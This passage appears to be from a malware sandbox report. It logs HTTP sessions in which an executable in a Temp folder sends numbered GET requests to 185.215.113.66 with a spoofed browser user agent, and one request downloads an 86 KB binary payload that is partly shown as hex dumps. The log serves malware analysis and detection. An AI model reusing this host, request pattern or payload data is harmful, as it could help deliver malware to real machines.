Apr 24, 2024 10:07:19.403055906 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:07:19 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Apr 24, 2024 10:07:21.425288916 CEST	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:07:21.762011051 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:07:21 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Apr 24, 2024 10:07:23.785530090 CEST	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:07:24.122106075 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:07:23 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Apr 24, 2024 10:07:26.144078016 CEST	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:07:26.483851910 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:07:26 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Apr 24, 2024 10:07:28.788214922 CEST	166	OUT	GET /6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:07:29.124979019 CEST	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:07:28 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49743	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:08:45.750771046 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:08:46.113019943 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:08:45 GMT Content-Type: application/octet-stream Content-Length: 86272 Last-Modified: Tue, 23 Apr 2024 21:15:20 GMT Connection: keep-alive ETag: "662824e8-15100" Accept-Ranges: bytes Data Raw: a8 4a f5 c3 4d 1e 89 ed 25 ad 4f 3b 68 ed 08 ba 62 02 f5 3e e5 71 7c d2 8a 81 92 a8 64 31 86 38 dc e1 cd 87 12 04 19 ea d1 c9 79 a1 00 a8 7a b6 06 d8 d2 d1 ad 21 c1 69 e6 d6 73 7e b2 94 f7 80 9f 96 01 92 0f 8b 13 23 cc ff 38 49 0f 77 72 a8 da 4b 60 7b d1 04 ee ff a5 bd 8e cf 56 23 15 db 17 a4 73 e1 bd 8f fe f3 80 6b ec 3f ea d0 f3 21 3e fb 3a e6 f4 0d 0f f0 0c ce 5b c5 d1 c7 9d 08 74 55 7a 82 54 f5 5d 3c b7 18 6e 69 67 6b 3f 75 a1 18 db 21 dd 6a 9a ea b7 d9 50 cc e4 e7 e5 22 d3 3c 53 a6 42 90 c9 d5 08 4e 78 44 15 b0 d8 bf 11 7c 56 cd 0f a1 28 44 ae 62 96 bf f4 fc ef 16 f3 bd b7 1d 44 de c3 a1 21 23 23 fc 67 9c ac 93 34 43 5f 0f 8f b2 fd f7 8c 65 bd 2f 15 e0 fd 81 71 50 7a 3d 53 81 55 c5 77 d6 a0 07 8f 42 a2 b4 18 8a 33 af 44 b2 6b 07 89 00 c0 1c cc ce 53 b0 0f 52 ce f7 63 3f c2 db 1b fc b1 d5 3d 1d 42 1c 82 ac 44 97 03 1c 77 0d 6b 9c b0 2f bb cf ed b5 4c 09 e1 72 99 31 95 9c 7b 73 b7 0a c2 b5 10 b2 4a 9f 67 95 1e e8 81 48 04 52 34 8c 59 e3 30 58 90 ca 24 69 0c b0 4a 33 a0 0c c1 76 c4 90 62 96 1d 8a 1e 09 f9 39 be dc 6d c2 97 a0 77 10 d2 08 01 b2 62 6f be e1 f6 f7 1f a7 65 08 ad 7a 6e bf cd b2 fb 55 9c 62 87 56 eb 2c 61 60 52 08 3a 90 e5 37 02 40 df 6f 74 b3 3b bf 2a e7 47 7a 74 5f 4c b1 f5 ec 9b 7f 43 73 a2 6b ed e6 be e8 c7 6a 4a ea cf 80 8e 68 e3 ff a5 3b 6e d6 29 91 f5 5d e6 48 22 3e c5 72 37 58 b6 4a 03 0c 3f 19 0a d4 79 9e fc 81 35 ce ca 88 5a 9f 27 e0 e2 87 d5 86 4a 4b c9 f4 20 64 dc e4 d5 26 65 eb 09 43 ae a1 26 ec 1a b5 a1 2f db 92 db ee 1c 5a ba 98 65 7e e7 87 da e2 b0 fc e3 90 8b 2c 39 51 9a f3 9e 48 3d 38 9c b6 45 62 0c 6a 63 8e fb 6d df 94 67 86 41 9f 01 54 7b a5 e6 2b d8 7a f1 84 fc 52 c2 33 fd 9c 1d 5a 35 12 6f 9e 42 90 ee 6c a9 0a 2b 43 05 ae a5 bb 4b f7 c6 10 f8 1b 37 57 de 22 ff d5 43 f1 bf eb 24 89 f0 17 6f b2 5f aa 96 b8 a8 69 58 64 cb ac f8 30 91 64 77 39 e7 de fc 05 aa 44 59 3e 23 09 75 9e a2 d2 05 bc 6e 50 e8 72 f6 ee ae 96 0d d8 21 15 51 57 d7 df 22 90 98 d1 4a 32 f6 ff 63 3d dd dc e6 71 7e ab 94 c2 21 7e 76 8a b6 d2 0a 70 9e b0 76 68 4c b0 9c 49 21 9a f3 c5 5f 68 ba e4 b9 a2 2f b5 9f 54 7f 47 fb d0 64 43 66 56 67 81 dd dd 7e 90 2f d5 1a 77 29 0a bd a7 43 5f 38 04 21 58 d6 38 2b 7b 48 40 77 7f 81 86 0f 4a a6 83 bc 73 f8 48 24 1c 42 38 79 9e b9 e1 6c a4 35 66 12 19 54 21 97 7e af 92 02 71 4d 92 62 d4 20 7c 41 f7 b5 62 0c c3 6f b6 fa 9f b3 83 d5 06 c5 df 10 f0 cc 69 18 f0 b1 fc 92 10 40 b8 ca 52 18 e5 1f e4 b1 43 35 fd 31 b0 34 46 98 7b 9b f3 02 05 33 df 66 6e 70 0b 66 0e ed 05 2e 2c 4f 1f 2f a6 89 f2 b1 c4 aa 28 18 75 70 75 2e 03 36 f2 17 cc cd 16 ec 50 6d ee f4 46 74 4f 65 34 be 40 69 91 ed 34 15 69 4d b9 56 4d fd 08 22 4a 9c b2 13 df c8 60 77 fe 51 b1 e0 0d 0d ca 89 8a 4c 73 dc 94 de 64 ce e7 aa 64 99 48 a5 4f 32 22 c6 7a 17 43 d9 bf 6d a7 d6 68 37 17 29 68 e5 2c 8f 88 1c 9b 7a 15 f2 ef 73 92 a5 35 d3 d1 c3 98 34 d6 1b a7 3a db 5a 1e 98 f0 e3 d6 d9 2a fd b6 f0 ba ca 8f c6 b0 ef 11 21 b0 55 03 12 ac 32 b1 84 3b 7d 09 60 0a b7 c4 e6 14 a2 90 f8 49 88 b3 79 d3 8a f0 0a c9 91 32 af 8d c9 26 fb 60 d1 68 5b d8 98 07 fc 19 7e 57 86 31 b5 04 7a fd 5b b3 ac 1e 62 62 16 37 88 e5 10 ad ba 6f 9c 98 78 Data Ascii: JM%O;hb>q\|d18yz!is~#8IwrK`{V#sk?!>:[tUzT]<nigk?u!jP"<SBNxD\|V(DbD!##g4C_e/qPz=SUwB3DkSRc?=BDwk/Lr1{sJgHR4Y0X$iJ3vb9mwboeznUbV,a`R:7@ot;Gzt_LCskjJh;n)]H">r7XJ?y5Z'JK d&eC&/Ze~,9QH=8EbjcmgAT{+zR3Z5oBl+CK7W"C$o_iXd0dw9DY>#unPr!QW"J2c=q~!~vpvhLI!_h/TGdCfVg~/w)C_8!X8+{H@wJsH$B8yl5fT!~qMb \|Aboi@RC514F{3fnpf.,O/(upu.6PmFtOe4@i4iMVM"J`wQLsddHO2"zCmh7)h,zs54:Z!U2;}`Iy2&`h[~W1z[bb7ox
Apr 24, 2024 10:08:46.113060951 CEST	1289	IN	Data Raw: d5 7b 0b 1e 78 9c ea 64 cd 53 48 60 6d 26 78 ad f2 45 08 0c c6 c5 b8 64 c4 4c 5a fe 02 ca 39 88 20 33 ab 45 a2 8c 64 bc 8d b6 05 f6 9d a5 58 39 54 37 1b 66 49 1e 3c 68 64 9f ec f2 5e eb f7 67 f5 3f 90 61 00 12 cf 6c 4b ac b9 ae 8e a0 55 83 e6 df Data Ascii: {xdSH`m&xEdLZ9 3EdX9T7fI<hd^g?alKUw$Ro.ewU7jKLQs?=~c=x+G#s6W.V{r-tFU(FC_/nQaK5T,_2fn0sq_{?*V$,V{gDi
Apr 24, 2024 10:08:46.113097906 CEST	1289	IN	Data Raw: d3 ba 70 f8 7b 03 35 cc af 43 6f 96 fe 29 a4 13 f9 a5 28 c9 f9 63 7b 67 2b eb d0 09 9b 5b 1b ef 51 89 bd 83 f1 27 eb 08 c1 15 b3 4a c8 26 45 e3 c0 aa d5 58 94 33 f2 74 b2 57 37 5a 8b d3 4c c0 38 03 d2 64 c7 b7 c6 bf e7 08 18 8c c4 10 da 14 0b 1f Data Ascii: p{5Co)(c{g+[Q'J&EX3tW7ZL8dI!-Ty'G>)W8r,QE%CIFhF>3ku!Z}5bdr^A^v1")r$MAhehC5q"BU"$tA"
Apr 24, 2024 10:08:46.113136053 CEST	1289	IN	Data Raw: e5 f7 c7 26 bc 85 8a 6c c9 58 78 e2 3e c4 d1 9c 5e 13 f1 b8 f3 3d c1 c1 1a b0 95 ab 3e 96 bb b4 ec d0 8e 14 c0 52 53 0f ca 6a 63 d8 43 ab a0 f9 01 93 f0 18 a9 56 0e 9c 6b 39 49 79 6c aa b2 79 cb fb 1d 18 e3 81 32 de 3a e6 19 41 15 ba 92 06 5d 7d Data Ascii: &lXx>^=>RSjcCVk9Iyly2:A]}-,.!$%G*`O<Qlqt~Xv,l%>8J#\|9tKT><}[^;n]/JuLRg\9SI=$@:@yw3$``T5=9a'gew1
Apr 24, 2024 10:08:46.113173962 CEST	1289	IN	Data Raw: 68 69 89 81 7c 2d 98 58 e2 47 ac 6a d7 bd 10 49 61 d9 ce 1c 44 05 52 88 7f 72 d7 f7 39 59 c9 55 2f c3 1b 07 fd b5 e8 c7 d3 52 32 5d bd fc 01 5c ff ac c9 64 77 ab a9 5b ad a2 0d dd d8 36 ae 57 ad 3e 77 fa 7b a6 54 1f 51 e7 4b 93 50 4a 66 44 3a 52 Data Ascii: hi\|-XGjIaDRr9YU/R2]\dw[6W>w{TQKPJfD:R=u`4nf_t0H[(=m(!Y)Sj0)PR*.FBoLjlGtnNa)9Q_nS4<0ql1('^qzw^ ?}k3KJS<
Apr 24, 2024 10:08:46.113215923 CEST	1289	IN	Data Raw: f2 7d da 93 7a 3a 14 25 2b 44 e3 ab 9b 5a 60 0c ae e0 95 34 a7 43 92 15 80 58 9c 5d ac cf 08 bd b6 75 fb 90 62 4c 39 23 dc 8d f5 44 f2 bd dc 65 c1 d8 1b 97 41 c9 76 8c bf f0 a2 c0 e2 58 d9 2e 5f 8f 50 91 46 17 88 27 54 c2 c0 99 de db cb 81 fd 2b Data Ascii: }z:%+DZ`4CX]ubL9#DeAvX._PF'T+gW+Sfs7AOL#.#Z,#Y6)i%[){#G2/DrWyXTTS_a21zs{DOVX]e){J}Rx}{a]!qk%wDv
Apr 24, 2024 10:08:46.113254070 CEST	1289	IN	Data Raw: ce 1e ad 79 cb c8 53 17 44 a1 fb 59 e4 97 27 7c 4d f1 ee 2e 3f 59 6d 99 27 99 ae 80 74 c9 a1 5e db 58 83 4a d9 f7 c4 43 b2 53 12 d9 ca 23 56 87 1f 61 99 51 97 21 4a fb f1 fe 44 5b 59 6e 44 7a 5d a0 69 d3 99 4b 80 48 a6 cc 67 45 82 d8 79 6a 2f 29 Data Ascii: ySDY'\|M.?Ym't^XJCS#VaQ!JD[YnDz]iKHgEyj/)$FowfW_x"#UU4Ca/H:!]2?3khpQY9bw^S`y6oPFh&iQNm%&gw>>GD`b
Apr 24, 2024 10:08:46.113311052 CEST	1289	IN	Data Raw: b8 1a ef 7a 58 1e 2a 5a f0 ca a0 98 f4 93 fa 72 45 df 40 f4 39 37 e1 f9 0d 4d 2c e2 a7 80 52 67 ff 64 a0 6e cb f7 15 17 66 a9 48 a3 58 85 7c 8e 14 64 16 ef d3 0e fc 99 ed f1 18 a7 67 41 ac 1e 1f 8f 7d 33 8f 5e e2 ba a4 98 30 4a 97 b6 3f 2b 69 2d Data Ascii: zXZrE@97M,RgdnfHX\|dgA}3^0J?+i-${2\|w'yc\|]Agx07MW&<$-+WEd4$ySsh7o%X*D FQA5${`?+L9m\|'D^
Apr 24, 2024 10:08:46.113351107 CEST	1289	IN	Data Raw: 75 5c 5e a0 0b 76 65 93 a0 62 d6 54 b0 02 66 24 b4 8d 51 47 5e 14 01 6e fb 0d 22 05 69 69 05 41 6a 9a d6 7b a2 25 a8 b4 03 44 fc f6 0b 97 87 1f 32 f3 e3 e9 7a e4 b1 f5 00 a9 0d fe 64 a3 f9 bc 8e 83 ea b9 b7 09 87 3c 51 35 b9 6b ad eb 85 d5 24 b5 Data Ascii: u\^vebTf$QG^n"iiAj{%D2zd<Q5k$h!\'0'#ORZo3.,U`9k,zh@NJv:>T<7!QazBdV(>Pg??qL2?Rr)\'[LYM`$
